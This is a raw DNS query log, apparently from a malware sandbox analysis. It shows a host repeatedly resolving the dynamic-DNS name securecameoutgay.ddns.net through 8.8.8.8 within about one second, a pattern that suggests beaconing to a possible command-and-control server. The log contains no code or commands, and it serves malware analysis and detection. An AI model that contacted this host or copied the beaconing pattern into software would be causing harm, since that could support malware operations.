                                                    Oct 12, 2024 23:05:59.157686949 CEST192.168.2.148.8.8.80xac25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.164263964 CEST192.168.2.148.8.8.80xac25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.170620918 CEST192.168.2.148.8.8.80xac25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.177303076 CEST192.168.2.148.8.8.80xac25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.183537006 CEST192.168.2.148.8.8.80xac25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.190078020 CEST192.168.2.148.8.8.80x460aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.197016954 CEST192.168.2.148.8.8.80x460aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.203476906 CEST192.168.2.148.8.8.80x460aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.209852934 CEST192.168.2.148.8.8.80x460aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.216511011 CEST192.168.2.148.8.8.80x460aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.222789049 CEST192.168.2.148.8.8.80x2b91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.229706049 CEST192.168.2.148.8.8.80x2b91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.236419916 CEST192.168.2.148.8.8.80x2b91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.242849112 CEST192.168.2.148.8.8.80x2b91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.249628067 CEST192.168.2.148.8.8.80x2b91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.256254911 CEST192.168.2.148.8.8.80x531fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.263283968 CEST192.168.2.148.8.8.80x531fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.270391941 CEST192.168.2.148.8.8.80x531fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.277177095 CEST192.168.2.148.8.8.80x531fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.284142017 CEST192.168.2.148.8.8.80x531fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.291023970 CEST192.168.2.148.8.8.80x9137Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.297502995 CEST192.168.2.148.8.8.80x9137Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.309207916 CEST192.168.2.148.8.8.80x9137Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.315746069 CEST192.168.2.148.8.8.80x9137Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.322410107 CEST192.168.2.148.8.8.80x9137Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.328900099 CEST192.168.2.148.8.8.80x97d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.335797071 CEST192.168.2.148.8.8.80x97d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.342709064 CEST192.168.2.148.8.8.80x97d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.349260092 CEST192.168.2.148.8.8.80x97d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.355781078 CEST192.168.2.148.8.8.80x97d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.362343073 CEST192.168.2.148.8.8.80xc983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.368763924 CEST192.168.2.148.8.8.80xc983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.375364065 CEST192.168.2.148.8.8.80xc983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.381903887 CEST192.168.2.148.8.8.80xc983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.388339043 CEST192.168.2.148.8.8.80xc983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.394689083 CEST192.168.2.148.8.8.80x4f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.401002884 CEST192.168.2.148.8.8.80x4f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.407852888 CEST192.168.2.148.8.8.80x4f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.414145947 CEST192.168.2.148.8.8.80x4f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.420667887 CEST192.168.2.148.8.8.80x4f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.427202940 CEST192.168.2.148.8.8.80x68afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.433629036 CEST192.168.2.148.8.8.80x68afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.440232038 CEST192.168.2.148.8.8.80x68afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.447190046 CEST192.168.2.148.8.8.80x68afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.454760075 CEST192.168.2.148.8.8.80x68afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.461234093 CEST192.168.2.148.8.8.80x3063Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.467668056 CEST192.168.2.148.8.8.80x3063Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.474160910 CEST192.168.2.148.8.8.80x3063Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.480590105 CEST192.168.2.148.8.8.80x3063Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.487289906 CEST192.168.2.148.8.8.80x3063Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.493962049 CEST192.168.2.148.8.8.80x7a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.500696898 CEST192.168.2.148.8.8.80x7a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.507549047 CEST192.168.2.148.8.8.80x7a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.515060902 CEST192.168.2.148.8.8.80x7a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.521728039 CEST192.168.2.148.8.8.80x7a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.528594971 CEST192.168.2.148.8.8.80x8612Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.535283089 CEST192.168.2.148.8.8.80x8612Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.542239904 CEST192.168.2.148.8.8.80x8612Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.549303055 CEST192.168.2.148.8.8.80x8612Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.556133032 CEST192.168.2.148.8.8.80x8612Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.563035965 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.569746017 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.576324940 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.583225965 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.589818001 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.596632957 CEST192.168.2.148.8.8.80xcb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.603322983 CEST192.168.2.148.8.8.80xcb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.609839916 CEST192.168.2.148.8.8.80xcb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.617922068 CEST192.168.2.148.8.8.80xcb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.624393940 CEST192.168.2.148.8.8.80xcb53Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.631093979 CEST192.168.2.148.8.8.80x52a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.637649059 CEST192.168.2.148.8.8.80x52a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.645013094 CEST192.168.2.148.8.8.80x52a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.651524067 CEST192.168.2.148.8.8.80x52a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.658188105 CEST192.168.2.148.8.8.80x52a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.664958000 CEST192.168.2.148.8.8.80xf9c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.671495914 CEST192.168.2.148.8.8.80xf9c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.678033113 CEST192.168.2.148.8.8.80xf9c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.684402943 CEST192.168.2.148.8.8.80xf9c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.690912008 CEST192.168.2.148.8.8.80xf9c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.698093891 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.704530954 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.712495089 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.718951941 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.727822065 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.735275984 CEST192.168.2.148.8.8.80xbb0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.743029118 CEST192.168.2.148.8.8.80xbb0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.750417948 CEST192.168.2.148.8.8.80xbb0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.757807016 CEST192.168.2.148.8.8.80xbb0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.764621019 CEST192.168.2.148.8.8.80xbb0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.772738934 CEST192.168.2.148.8.8.80xe6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.781122923 CEST192.168.2.148.8.8.80xe6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.787580967 CEST192.168.2.148.8.8.80xe6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.795382977 CEST192.168.2.148.8.8.80xe6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.803282022 CEST192.168.2.148.8.8.80xe6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.810165882 CEST192.168.2.148.8.8.80xd06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.817183971 CEST192.168.2.148.8.8.80xd06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.825861931 CEST192.168.2.148.8.8.80xd06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.832577944 CEST192.168.2.148.8.8.80xd06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.838912964 CEST192.168.2.148.8.8.80xd06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.845626116 CEST192.168.2.148.8.8.80x9221Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.852217913 CEST192.168.2.148.8.8.80x9221Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.858968973 CEST192.168.2.148.8.8.80x9221Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.866880894 CEST192.168.2.148.8.8.80x9221Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.873698950 CEST192.168.2.148.8.8.80x9221Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.880130053 CEST192.168.2.148.8.8.80xc39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.886915922 CEST192.168.2.148.8.8.80xc39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.893753052 CEST192.168.2.148.8.8.80xc39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.900161028 CEST192.168.2.148.8.8.80xc39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.907121897 CEST192.168.2.148.8.8.80xc39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.914638996 CEST192.168.2.148.8.8.80x21ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.921132088 CEST192.168.2.148.8.8.80x21ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.927736044 CEST192.168.2.148.8.8.80x21ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.934292078 CEST192.168.2.148.8.8.80x21ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.940699100 CEST192.168.2.148.8.8.80x21ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.947133064 CEST192.168.2.148.8.8.80x3c55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.953551054 CEST192.168.2.148.8.8.80x3c55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.959975958 CEST192.168.2.148.8.8.80x3c55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.966578007 CEST192.168.2.148.8.8.80x3c55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.973025084 CEST192.168.2.148.8.8.80x3c55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.979492903 CEST192.168.2.148.8.8.80x2defStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.986315012 CEST192.168.2.148.8.8.80x2defStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.992985964 CEST192.168.2.148.8.8.80x2defStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:59.999876022 CEST192.168.2.148.8.8.80x2defStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.006742954 CEST192.168.2.148.8.8.80x2defStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.013293982 CEST192.168.2.148.8.8.80x80f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.019556999 CEST192.168.2.148.8.8.80x80f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.026165962 CEST192.168.2.148.8.8.80x80f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.032663107 CEST192.168.2.148.8.8.80x80f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.039201975 CEST192.168.2.148.8.8.80x80f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.045577049 CEST192.168.2.148.8.8.80xaaf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.052200079 CEST192.168.2.148.8.8.80xaaf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.058581114 CEST192.168.2.148.8.8.80xaaf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.065222025 CEST192.168.2.148.8.8.80xaaf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.071880102 CEST192.168.2.148.8.8.80xaaf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.078157902 CEST192.168.2.148.8.8.80xa8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.084652901 CEST192.168.2.148.8.8.80xa8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.091070890 CEST192.168.2.148.8.8.80xa8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.097398043 CEST192.168.2.148.8.8.80xa8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.103951931 CEST192.168.2.148.8.8.80xa8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.110246897 CEST192.168.2.148.8.8.80xb9e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.116714001 CEST192.168.2.148.8.8.80xb9e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.123300076 CEST192.168.2.148.8.8.80xb9e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.129802942 CEST192.168.2.148.8.8.80xb9e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.136307001 CEST192.168.2.148.8.8.80xb9e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.142870903 CEST192.168.2.148.8.8.80xbdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.149283886 CEST192.168.2.148.8.8.80xbdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.155883074 CEST192.168.2.148.8.8.80xbdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.162532091 CEST192.168.2.148.8.8.80xbdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.168932915 CEST192.168.2.148.8.8.80xbdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.175415039 CEST192.168.2.148.8.8.80x3cfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.182295084 CEST192.168.2.148.8.8.80x3cfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.188788891 CEST192.168.2.148.8.8.80x3cfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.195338011 CEST192.168.2.148.8.8.80x3cfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.202394009 CEST192.168.2.148.8.8.80x3cfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.208709002 CEST192.168.2.148.8.8.80x9338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.215313911 CEST192.168.2.148.8.8.80x9338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.221925020 CEST192.168.2.148.8.8.80x9338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.228795052 CEST192.168.2.148.8.8.80x9338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.234981060 CEST192.168.2.148.8.8.80x9338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.241345882 CEST192.168.2.148.8.8.80x8b5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.247797012 CEST192.168.2.148.8.8.80x8b5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.254403114 CEST192.168.2.148.8.8.80x8b5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.261233091 CEST192.168.2.148.8.8.80x8b5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.268229008 CEST192.168.2.148.8.8.80x8b5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.274672985 CEST192.168.2.148.8.8.80xda88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.281027079 CEST192.168.2.148.8.8.80xda88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.287452936 CEST192.168.2.148.8.8.80xda88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.293921947 CEST192.168.2.148.8.8.80xda88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.300292015 CEST192.168.2.148.8.8.80xda88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.306792974 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.313196898 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.319580078 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.325717926 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.332256079 CEST192.168.2.148.8.8.80xc80fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.339118958 CEST192.168.2.148.8.8.80xdd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.345541954 CEST192.168.2.148.8.8.80xdd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.351923943 CEST192.168.2.148.8.8.80xdd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.358608007 CEST192.168.2.148.8.8.80xdd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.365041971 CEST192.168.2.148.8.8.80xdd77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.371949911 CEST192.168.2.148.8.8.80xaa08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.378627062 CEST192.168.2.148.8.8.80xaa08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.385467052 CEST192.168.2.148.8.8.80xaa08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.392005920 CEST192.168.2.148.8.8.80xaa08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.398288012 CEST192.168.2.148.8.8.80xaa08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.404789925 CEST192.168.2.148.8.8.80xaae2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.411499023 CEST192.168.2.148.8.8.80xaae2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
